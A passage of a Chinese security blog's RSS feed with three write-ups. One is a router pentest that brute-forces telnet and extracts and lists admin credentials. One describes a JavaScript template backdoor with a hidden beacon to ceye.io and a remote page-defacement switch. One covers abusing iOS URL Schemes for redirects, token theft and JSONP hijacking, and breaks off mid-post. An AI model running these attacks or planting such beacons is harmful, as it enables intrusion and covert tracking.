set PASS_FILE /root/pass.txt #设置密码字典
exploit 192.168.1.1 #启动
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;幸运的是爆破出来了，是组合弱口令：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/cmcc-pentest/telnet_brute.png&quot; alt=&quot;telnet_brute&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;获取密码&quot;&gt;获取密码&lt;/h2&gt;

&lt;p&gt;运行&lt;code&gt;telnet 192.168.1.1 8023&lt;/code&gt;输入账号密码进去，执行&lt;code&gt;sh&lt;/code&gt;发现可以直接进入shell：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/cmcc-pentest/telnet_shell.png&quot; alt=&quot;telnet_shell&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接下来就是找密码到处瞎翻（没有PWN路由器的经验，很难受），执行 &lt;code&gt;ls -a -l&lt;/code&gt; 发现有软链接，很多指向了&lt;code&gt;/tmp&lt;/code&gt;目录：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/cmcc-pentest/ls.png&quot; alt=&quot;ls&quot; /&gt;&lt;/p&gt;

&lt;p&gt;于是进入&lt;code&gt;/tmp&lt;/code&gt;目录，到处翻腾：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/cmcc-pentest/tmp.png&quot; alt=&quot;tmp&quot; /&gt;&lt;/p&gt;

&lt;p&gt;利用这几个关键词看看是否有文件中包含了：&lt;code&gt;admin&lt;/code&gt;、&lt;code&gt;CMCC&lt;/code&gt;(中国移动)、&lt;code&gt;password&lt;/code&gt;、&lt;code&gt;user&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;e.g. &lt;code&gt;grep &apos;admin&apos; ./*&lt;/code&gt;，等了老半天了，发现&lt;code&gt;/tmp/ctromfile.cfg&lt;/code&gt;文件内有点东西：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/cmcc-pentest/admin.png&quot; alt=&quot;admin&quot; /&gt;&lt;/p&gt;

&lt;p&gt;复制密码登录，怼进去：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/cmcc-pentest/cmccadmin.png&quot; alt=&quot;cmccadmin&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;信息整合&quot;&gt;信息整合&lt;/h2&gt;

&lt;p&gt;做完测试并针对测试过程的信息进行整合，最后形成字典以便后面再次遇到～&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;通过读配置文件获取的一系列用户名、密码：&lt;code&gt;9vvrr、admin、aDm8H%MdA、CMCCAdmin、telnetuser、user&lt;/code&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;文件、目录路径：
    &lt;ul&gt;
      &lt;li&gt;&lt;code&gt;/GET_USER_WAN_PPP_INFO.json&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;code&gt;/GET_WLAN_LINK_INFO.json&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;code&gt;/GET_NET_DHCP_INFO.json&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;code&gt;/telnet.asp&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;code&gt;/index.asp&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;code&gt;/user.html&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;code&gt;/upgrade.asp&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;code&gt;/cgi-bin/&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;code&gt;/content.asp&lt;/code&gt;&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;指纹特征：
    &lt;ul&gt;
      &lt;li&gt;标题：&lt;code&gt;HGU LOGIN&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;图片：&lt;code&gt;/webstyle/images/login-mobile-qrcode-anhui.png -&amp;gt; 23cb4f5e63e0cd47f8788a6ca3558eab&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;JS：&lt;code&gt;/webstyle/js/br_login_nc.js&lt;/code&gt;&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;结尾&quot;&gt;结尾&lt;/h1&gt;

&lt;p&gt;最后我只是默默的把user用户密码改了一下～&lt;/p&gt;
</description>
          <pubDate>2019-03-12T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2019-03-12/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2019-03-12/1</guid>
        </item>
      
    
      
        <item>
          <title>我为何在博客模板留后门</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;在前段时间，我在我博客的模板上加入了后门（JavaScript），今天去除，并将思路简单的写出来。&lt;/p&gt;

&lt;h2 id=&quot;为什么留后门呢&quot;&gt;为什么留后门呢？&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;起因&lt;/strong&gt;：在前不久，团队官网模板就被偷走，很让人生气，抄袭者团队（以下简称为：A）没有打一声招呼就拿走了，但可笑的是A并没有在模板中修改JavaScript文件的外链引用，而是直接使用我们的JavaScript文件，所以简单的利用JS修改了一下其主页，提醒了下他，经过后来A主动与我联系并道歉，这件事情才结束～&lt;/p&gt;

&lt;p&gt;让我吃惊的是，这件事之后我发现我博客主题模板被拿走了，是的，不止一个哥们。&lt;/p&gt;

&lt;p&gt;我在我的博客项目中说明了&lt;code&gt;https://github.com/gh0stkey/gh0stkey.github.io&lt;/code&gt;&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;个人博客 gh0st.cn 模版来自：https://github.com/heiswayi/the-plain 在原基础上增加了分页、网易云音乐播放器等功能（做了一些排版细节上的调整），拿之前告诉我下，谢谢！&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;因为博客采用的是Github Pages + Jekyll，所以需要依赖于Github的进行托管，模板也就自然而然的可以直接&lt;code&gt;git clone&lt;/code&gt;下来，模板也是我进行二次修改的，我觉得起码要尊重下作者，在博客主题或项目之类的进行说明，打声招呼也行，一声不吭的拿走是几个意思……&lt;/p&gt;

&lt;p&gt;有个好兄弟说过这样一段话，望周知：&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;参考别人的研究成果，注明来源是基本素质，每个人都应该构建一个和谐积极向上的氛围，知道的人不愿意分享的原因就是不被别人认可，互相认可才能进步，现在理解一些师傅的苦衷了，挺悲哀的。请各位在以后的学习生涯上，尊重别人的分享，认可他人，互相感染才能进步。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h1 id=&quot;关于后门&quot;&gt;关于后门&lt;/h1&gt;

&lt;p&gt;我是一个“重度洁癖患者”，不喜欢自己的任何东西带上任何污点。包括对于在自己博客模板中加入后门，这对我来说是一件带有“大污点”的事情，所以思考了很久决定加上后门。&lt;/p&gt;

&lt;h2 id=&quot;后门的构建&quot;&gt;后门的构建&lt;/h2&gt;

&lt;h3 id=&quot;javascript-后门&quot;&gt;JavaScript 后门&lt;/h3&gt;

&lt;p&gt;模板后门选择的是JavaScript外链引用，而JavaScript的内容构建步骤如下：&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1.判断是否是自己的域名（这个正则写的不严谨是可以被绕过的，例如：&lt;code&gt;gh0st.cn.bypass.cn&lt;/code&gt;）：&lt;/strong&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;var host = document.location.host; //获取host
var reg = new RegExp(/gh0st.cn/); //创建正则
var isok = reg.test(host); //匹配结果：False\True
if(!isok){//判断
	...code
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;2.触发式：在一个Web服务上添加了isopen.txt这个文件，内容为NO则不触发，内容为YES则触发。（选择触发式的原因是因为博客上线有本地调试这一环节，如果在本地就触发了，那岂不是得不偿失，没有造成什么直接损害～）&lt;/strong&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;var xhr = new XMLHttpRequest(); //创建XMLHttpRequest
xhr.onreadystatechange=function(){ //请求成功则触发
	if(xhr.responseText == &quot;YES&quot;){ //判断请求网站的内容是否是YES，如果是则进行下一步
		document.write(&quot;&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;Please tell me before using my template!By:[Vulkey_Chen]&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;&quot;); //页面内容修改
	}
}
xhr.open(&quot;GET&quot;,&quot;http://webserver/isopen.txt&quot;,true); //请求http://webserver/isopen.txt
xhr.send(null);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;3.既然选择了触发式的后门，那么就需要知道是谁偷了模板，这里利用的是&lt;code&gt;ceye.io&lt;/code&gt;这个平台去记录“小偷”的域名和IP之类的东西：&lt;/strong&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;var img = document.createElement(&quot;img&quot;); //创建img标签
img.src=&quot;http://myblog.你的地址.ceye.io/fuck?domain=&quot; + host; //设置img标签的src属性
img.stytle.display=&quot;none&quot;; //设置img标签的样式的display属性为none（表示这个将图片隐藏）
document.body.appendChild(img); //在DOM节点(body)内加入img标签
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;4.在博客模板的header.html中引用了外部的JS地址&lt;code&gt;&amp;lt;script src=&quot;http://webserver/xxx.js&quot;&amp;gt;&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;完整代码如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;var host = document.location.host;
var reg = new RegExp(/gh0st.cn/);
var isok = reg.test(host);
if(!isok){
	var img = document.createElement(&quot;img&quot;);
    img.src=&quot;http://myblog.你的地址.ceye.io/fuck?domain=&quot; + host;
    img.stytle.display=&quot;none&quot;;
    document.body.appendChild(img);
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange=function(){
        if(xhr.responseText == &quot;YES&quot;){
        	document.write(&quot;&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;Please tell me before using my template!By:[Vulkey_Chen]&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;&quot;);
        }
    }
    xhr.open(&quot;GET&quot;,&quot;http://webserver/isopen.txt&quot;,true);
    xhr.send(null);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;python-监控&quot;&gt;Python 监控&lt;/h3&gt;

&lt;p&gt;利用&lt;code&gt;ceye.io&lt;/code&gt;这个平台的API去实时监控，并且使用邮件发信通知。&lt;/p&gt;

&lt;p&gt;导入Python模块 &amp;amp;&amp;amp; 全局变量：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;import smtplib,requests,json,urlparse,sys
from email.MIMEText import MIMEText
from email.Utils import formatdate
from email.Header import Header

log = {}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;1.163邮件发信：&lt;/strong&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def send_mail(domain,ip):
	smtpHost = &apos;smtp.163.com&apos;
	smtpPort = &apos;25&apos;
	fromMail = &apos;邮箱账户&apos;
	toMail = &apos;邮箱账户,收信方&apos;
	username = &apos;邮箱账户&apos;
	password = &apos;邮箱密码&apos;
	reload(sys)
	sys.setdefaultencoding(&apos;utf8&apos;)

	subject = u&apos;博客监控到有人偷模板！&apos;
	body = u&quot;[小偷信息]\nDomain: {0} IP: {1}&quot;.format(domain,ip)

	encoding = &apos;utf-8&apos;
	mail = MIMEText(body.encode(encoding),&apos;plain&apos;,encoding)
	mail[&apos;Subject&apos;] = Header(subject,encoding)
	mail[&apos;From&apos;] = fromMail
	mail[&apos;To&apos;] = toMail
	mail[&apos;Date&apos;] = formatdate()

	try:
		smtp = smtplib.SMTP(smtpHost,smtpPort)
		smtp.ehlo()
		smtp.login(username,password)
		smtp.sendmail(fromMail,toMail.split(&apos;,&apos;),mail.as_string())
		print u&quot;邮件已发送，监控信息：&quot;
		print body
	except Exception,e:
		print e
		print u&quot;发送失败，监控信息：&quot;
		print body
	finally:
		smtp.close()
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;2.ceye.io API调用获取信息，&lt;a href=&quot;http://ceye.io/profile&quot;&gt;个人中心&lt;/a&gt;可以看见API TOKEN，&lt;a href=&quot;http://ceye.io/api&quot;&gt;API使用方法&lt;/a&gt;：&lt;/strong&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def dnslog_monitor():
	api = &quot;http://api.ceye.io/v1/records?token=你的TOKEN&amp;amp;type=http&amp;amp;filter=myblog&quot;
	r = requests.get(api)
	json_data = json.loads(r.text)
	for i in json_data[&apos;data&apos;]:
		query = urlparse.urlparse(i[&apos;name&apos;]).query
		sb_domain = dict([(k, v[0]) for k, v in urlparse.parse_qs(query).items()])[&apos;domain&apos;]
		sb_ip = i[&apos;remote_addr&apos;]
		if sb_domain in log:
			pass
		else:
			log[sb_domain] = sb_ip
			send_mail(sb_domain,sb_ip)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;3.main函数：&lt;/strong&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;def main():
	while True:
		dnslog_monitor()
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;后门的运行&quot;&gt;后门的运行&lt;/h2&gt;

&lt;p&gt;python脚本挂在服务器跑了一段时间，也发现了一个哥们又拿走了我的博客模板：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2019-01-23/0.png&quot; alt=&quot;oh,no&quot; /&gt;&lt;/p&gt;

&lt;p&gt;让他”用”了一段时间，便将isopen.txt的内容改为了YES（即触发了后门），其后来也与我联系，并进行了和解。&lt;/p&gt;

&lt;h1 id=&quot;写在最后的话&quot;&gt;写在最后的话&lt;/h1&gt;

&lt;p&gt;也是因为“重度洁癖”，决定将模板后门去除。望君尊重技术、分享、作者，共勉！&lt;/p&gt;
</description>
          <pubDate>2019-01-23T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2019-01-23/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2019-01-23/1</guid>
        </item>
      
    
      
        <item>
          <title>iOS URL Schemes与漏洞的碰撞组合</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;iOS URL Schemes，这个单词对于大多数人来说可能有些陌生，但是类似下面这张图的提示大部分人应该都经常看见：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/0.png&quot; alt=&quot;wechat&quot; /&gt;&lt;/p&gt;

&lt;p&gt;今天要探究的就是：了解iOS URL Schemes、如何发现iOS URL Schemes、iOS URL Schemes结合漏洞案例。&lt;/p&gt;

&lt;h1 id=&quot;ios-url-schemes&quot;&gt;iOS URL Schemes&lt;/h1&gt;

&lt;h2 id=&quot;基本概念&quot;&gt;基本概念&lt;/h2&gt;

&lt;p&gt;抛开iOS从URL Schemes的字面意思理解，就是地址协议（&lt;strong&gt;Scheme一般用来表示协议，比如 http、https、ftp 等&lt;/strong&gt;），我们所熟知的HTTP协议的URL格式就是：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;http(s)://user:pass@host:port/path?query&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;举个例子：&lt;code&gt;http://gh0st.cn/&lt;/code&gt;，在浏览器输入这个地址，浏览器是使用HTTP协议向 &lt;strong&gt;gh0st.cn&lt;/strong&gt; 请求，请求的资源就是 &lt;strong&gt;/&lt;/strong&gt; 。&lt;/p&gt;

&lt;p&gt;再来看一下iOS URL Schemes的一个例子：&lt;code&gt;weixin://&lt;/code&gt;，你在Safari浏览器(Mobile)输入这个网址就会提示你&lt;code&gt; 在&quot;微信&quot;中打开链接吗？&lt;/code&gt;，然后由你选择”取消”或”打开”；&lt;strong&gt;和HTTP协议格式的URL访问流程进行对比，iOS URL Schemes 实际上就是启动一个应用的 URL&lt;/strong&gt;，其访问流程是这样的：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;浏览器输入&quot;weixin://&quot; -&amp;gt; iOS识别URL Schemes -&amp;gt;询问是否跳转到微信 -&amp;gt; 确认跳转 -&amp;gt; 从浏览器跳转到微信端&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;那么问题就来了，以上所述流程中的”&lt;strong&gt;iOS识别URL Schemes&lt;/strong&gt;“，iOS如何识别这段URL Schemes？&lt;strong&gt;iOS官方要求的是APP开发者需要自己定义自己APP的”URL Schemes”，只有APP本身定义(支持)了URL Schemes，iOS才会去识别然后跳转&lt;/strong&gt;。&lt;/p&gt;

&lt;h2 id=&quot;定义&quot;&gt;定义&lt;/h2&gt;

&lt;p&gt;一个完整的 URL Schemes 应该分为 Scheme、Action、Parameter、Value 这 4 个部分，中间用冒号 &lt;code&gt;:&lt;/code&gt;、斜线 &lt;code&gt;/&lt;/code&gt;、问号 &lt;code&gt;?&lt;/code&gt;、等号 &lt;code&gt;=&lt;/code&gt; 相连接。&lt;/p&gt;

&lt;p&gt;举个例子：&lt;code&gt;mst://jump?url=https://gh0st.cn/&amp;amp;title=test&lt;/code&gt;，它对应的4部分就是如下所示：&lt;/p&gt;

&lt;p&gt;Scheme（头）: &lt;code&gt;mst&lt;/code&gt;、Action（动作）: &lt;code&gt;jump&lt;/code&gt;、Parameter（参数）: &lt;code&gt;url、title&lt;/code&gt;、Value（值）: &lt;code&gt;https://gh0st.cn、test&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;不同的部分之间有符号相连，它们也有一定的规则(和URL部分规则是一样的)：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;冒号&lt;code&gt;:&lt;/code&gt;：在&lt;strong&gt;链接头&lt;/strong&gt;和&lt;strong&gt;命令&lt;/strong&gt;之间；&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;双斜杠 &lt;code&gt;//&lt;/code&gt;：在&lt;strong&gt;链接头和命令&lt;/strong&gt;之间，有时会是三斜杠 &lt;code&gt;///&lt;/code&gt;；&lt;/li&gt;
  &lt;li&gt;问号 &lt;code&gt;?&lt;/code&gt;：在&lt;strong&gt;命令和参数&lt;/strong&gt;之间；&lt;/li&gt;
  &lt;li&gt;等号 &lt;code&gt;=&lt;/code&gt;：在&lt;strong&gt;参数和值&lt;/strong&gt;之间；&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;和符号&lt;/strong&gt; &lt;code&gt;&amp;amp;&lt;/code&gt;：在&lt;strong&gt;一组参数和另一组参数&lt;/strong&gt;之间。&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;理解&quot;&gt;理解&lt;/h3&gt;

&lt;p&gt;以上述所举的例子：&lt;code&gt;mst://jump?url=https://gh0st.cn/&amp;amp;title=test&lt;/code&gt;，来简单的说明下这段URL Scheme所产生的效果：&lt;/p&gt;

&lt;p&gt;1.跳转到”mst”所对应的APP&lt;/p&gt;

&lt;p&gt;2.在APP中执行jump动作（跳转网站）&lt;/p&gt;

&lt;p&gt;3.告诉APPjump动作所需的&lt;code&gt;url&lt;/code&gt;和&lt;code&gt;title&lt;/code&gt;参数，对应的值分别为&lt;code&gt;https://gh0st.cn/&lt;/code&gt;和&lt;code&gt;test&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;可以理解为在APP应用中访问&lt;code&gt;https://gh0st.cn/&lt;/code&gt;，网页标题为&lt;code&gt;test&lt;/code&gt;。&lt;/strong&gt;&lt;/p&gt;

&lt;h1 id=&quot;寻找ios-app的url-schemes&quot;&gt;寻找iOS APP的URL Schemes&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;当你学会了如何寻找APP的URL Schemes，你就算发现了半个漏洞。&lt;/strong&gt;&lt;/p&gt;

&lt;h2 id=&quot;获取ipa包&quot;&gt;获取IPA包&lt;/h2&gt;

&lt;p&gt;基本的URL Schemes可以在iOS APP中的Info.plist文件中寻找到，而一般你是无法获取到APP的ipa包的，所以需要借助软件获取到这个包。&lt;/p&gt;

&lt;p&gt;前提是你需要这两台设备：MacBook、iPhone，如果你只拥有一台iPhone的话也有办法去获取（需要Thor APP，具体方法自行寻找）。&lt;/p&gt;

&lt;p&gt;Mac上先安装Apple Configurator 2，然后你需要在该软件中登录你的Apple账户：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/1.png&quot; alt=&quot;login&quot; /&gt;&lt;/p&gt;

&lt;p&gt;使用iPhone充电线将手机连接Mac，这时候软件中就会显示已经连接Mac的设备：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/2.png&quot; alt=&quot;iphone&quot; /&gt;&lt;/p&gt;

&lt;p&gt;假设你需要获取微信的URL Schemes，那么你的手机已经安装过了微信，然后使用该软件进行添加，选中设备点击添加按钮，选择应用：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/3.png&quot; alt=&quot;add&quot; /&gt;&lt;/p&gt;

&lt;p&gt;搜索微信，选中添加：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/4.png&quot; alt=&quot;add wechat&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当你下载完成看见如下提示的时候，在Finder中按快捷键&lt;code&gt;Command+Shift+G&lt;/code&gt;，输入&lt;code&gt;~/资源库/Group Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps/&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/5.png&quot; alt=&quot;tip&quot; /&gt;&lt;/p&gt;

&lt;p&gt;软件下载的微信ipa文件就存在该文件夹中：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/6.png&quot; alt=&quot;ipa&quot; /&gt;&lt;/p&gt;

&lt;p&gt;进入文件夹将ipa文件复制到其他地方：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/7.png&quot; alt=&quot;move&quot; /&gt;&lt;/p&gt;

&lt;p&gt;然后回到Apple Configurator 2的提示，点击停止即可。&lt;/p&gt;

&lt;h2 id=&quot;获取基本url-schemes&quot;&gt;获取基本URL Schemes&lt;/h2&gt;

&lt;p&gt;将IPA包后缀名修改为ZIP，然后解压，进入Payload目录会看见一个.APP后缀名文件，选中文件右击显示包内容：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/8.png&quot; alt=&quot;view&quot; /&gt;&lt;/p&gt;

&lt;p&gt;找到Info.plist文件并打开，搜索关键词&lt;code&gt;URLSchemes&lt;/code&gt;：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/9.png&quot; alt=&quot;find&quot; /&gt;&lt;/p&gt;

&lt;p&gt;被&lt;code&gt;String&lt;/code&gt;标签所包含的就是微信的URL Schemes：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-xml&quot;&gt;&amp;lt;string&amp;gt;wexinVideoAPI&amp;lt;/string&amp;gt;
&amp;lt;string&amp;gt;weixin&amp;lt;/string&amp;gt;
&amp;lt;string&amp;gt;weixinapp&amp;lt;/string&amp;gt;
&amp;lt;string&amp;gt;fb290293790992170&amp;lt;/string&amp;gt;
&amp;lt;string&amp;gt;wechat&amp;lt;/string&amp;gt;
&amp;lt;string&amp;gt;QQ41C152CF&amp;lt;/string&amp;gt;
&amp;lt;string&amp;gt;prefs&amp;lt;/string&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;寻找完整url-schemes&quot;&gt;寻找完整URL Schemes&lt;/h3&gt;

&lt;p&gt;如上已经了解了如何获取最基本的URL Schemes，但是这远远不够，因为完整的URL Schemes有4部分，而目前只找到了第一部分，仅仅能做到的功能就是启动，而想找到更多的非基本URL Schemes需要其他的方法。有很多方法在这里不一一例举了，只例几个常见的思路供你参考。&lt;/p&gt;

&lt;h3 id=&quot;从手机站点页面获取&quot;&gt;从手机站点页面获取&lt;/h3&gt;

&lt;p&gt;一般网站都会有这些子域名：m\h5\mobile…&lt;/p&gt;

&lt;p&gt;打开这些子域名，利用Chrome的开发者工具(F12)切换为手机模式视图，这样就能模拟手机去访问了：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/10.png&quot; alt=&quot;Chrome&quot; /&gt;&lt;/p&gt;

&lt;p&gt;那在这里可以在该页面的HTML代码中寻找URL Schemes（前提是你已经知道了基本的URL Schemes）&lt;/p&gt;

&lt;p&gt;在这里我从页面的JavaScript代码中发现了很多URL Schemes：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/11.png&quot; alt=&quot;URL Schemes&quot; /&gt;&lt;/p&gt;

&lt;p&gt;有些还有参数，可以根据命名来猜这些URL Schemes的含义，例如&lt;code&gt;path: &quot;mst://jump/core/web/jump&quot;&lt;/code&gt;，就可以知道这个是做Web跳转的，那跳转到哪个地址是什么参数控制呢？下面也有对应的告诉我们是&lt;code&gt;url&lt;/code&gt;参数去控制，也就组成了这样一个URL Scheme: &lt;code&gt;mst://jump/core/web/jump?url=https://gh0st.cn&lt;/code&gt;&lt;/p&gt;

&lt;h3 id=&quot;qrlcode解析地址获取&quot;&gt;QRLCode解析地址获取&lt;/h3&gt;

&lt;p&gt;现在很多网站都支持二维码登录，就比如如下这个网站：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/12.png&quot; alt=&quot;qrlcode&quot; /&gt;&lt;/p&gt;

&lt;p&gt;保存该二维码进行二维码解析：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/13.png&quot; alt=&quot;text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;解析得出这是一个URL Scheme，修改json参数url的值为我的网站尝试在浏览器中打开成功的触发了跳转APP，并且在APP中访问了我的网站。&lt;/p&gt;

&lt;h3 id=&quot;逆向app&quot;&gt;逆向APP&lt;/h3&gt;

&lt;p&gt;不仅是iOS，安卓也支持URL Schemes，而一般的定义是一样的，所以你可以基于&lt;code&gt;获取基本URL Schemes&lt;/code&gt;这个步骤将.APP文件的后缀去掉，这时候这个文件就变成了一个文件夹拖到Sublime里面全局搜索”&lt;strong&gt;weixin://&lt;/strong&gt;“即可。&lt;/p&gt;

&lt;p&gt;至于安卓的APK的逆向可以参考我之前的一篇文章&amp;lt; &lt;a href=&quot;https://gh0st.cn/archives/2018-11-18/1&quot;&gt;打造Mac下APK逆向环境到实战接口XSS挖掘&lt;/a&gt; &amp;gt;，可以在源代码中、所有文件内容中搜索URL Schemes。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/14.png&quot; alt=&quot;search&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;漏洞案例&quot;&gt;漏洞案例&lt;/h1&gt;

&lt;h2 id=&quot;app内url跳转问题&quot;&gt;APP内URL跳转问题&lt;/h2&gt;

&lt;p&gt;其实严格来讲这不算是漏洞，毕竟利用有限，但又和&lt;strong&gt;一切能产生危害的问题都算漏洞&lt;/strong&gt;这句话所冲突，所以在这还是选择列了出来，至于厂商觉不觉得是个安全性问题，还要看他们对“安全风险“的定义。&lt;/p&gt;

&lt;p&gt;如何发现这类问题？在上文中我提到了如何发现URL Schemes，只要你发现了这种类型的URL Schemes就可以尝试替换地址为你的地址然后使用浏览器打开查看是否能在APP内跳转到你的地址，当然利用方式也很简单，构建一个HTML页面即可，然后将网址发送给“&lt;strong&gt;受害者&lt;/strong&gt;”即可：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;script&amp;gt;
window.location=&apos;URL Schemes&apos;;
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;凭证窃取设计不当&quot;&gt;凭证窃取（设计不当）&lt;/h2&gt;

&lt;p&gt;在做一次漏洞挖掘的时候也碰见了很多次这种问题，大概的描述下就是我找到了能在APP中打开网页的入口方式（例如：二维码扫描、URL Schemes动作），让APP访问到我的地址，这样我就可以直接获取到APP中登录后的凭证信息。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-12-08/15.png&quot; alt=&quot;gettoken&quot; /&gt;&lt;/p&gt;

&lt;p&gt;利用方式和URL跳转的方式是一样的；关于这方面漏洞产生原理得出一个可能“&lt;strong&gt;不太严谨的结论&lt;/strong&gt;”：&lt;strong&gt;APP在做HTTP请求的时候默认所有访问的都是信任域，所以带上了本身已经登录的凭证去请求了&lt;/strong&gt;。&lt;/p&gt;

&lt;h3 id=&quot;结合漏洞扩大攻击面&quot;&gt;结合漏洞扩大攻击面&lt;/h3&gt;

&lt;p&gt;在一次APP的漏洞挖掘中发现了一个JSONP劫持的问题，但是在这里只会对APP用户产生影响，在没有二维码扫描的情况下就需要结合URL Schemes来扩大这个漏洞的影响面，而不是局限于self。&lt;/p&gt;

&lt;p&gt;利用流程：&lt;/p&gt;

&lt;p&gt;用户打开https://gh0st.cn/test.html，test.html内容：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;script&amp;gt;
window.location=&apos;mst://jump?url=https://gh0st.cn/jsonp.html&apos;;
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;用户点开之后启动&lt;code&gt;mst应用&lt;/code&gt;执行&lt;code&gt;jump动作&lt;/code&gt;，跳转到https://gh0st.cn/jsonp.html，jsonp.html内容：&lt;/p&gt;

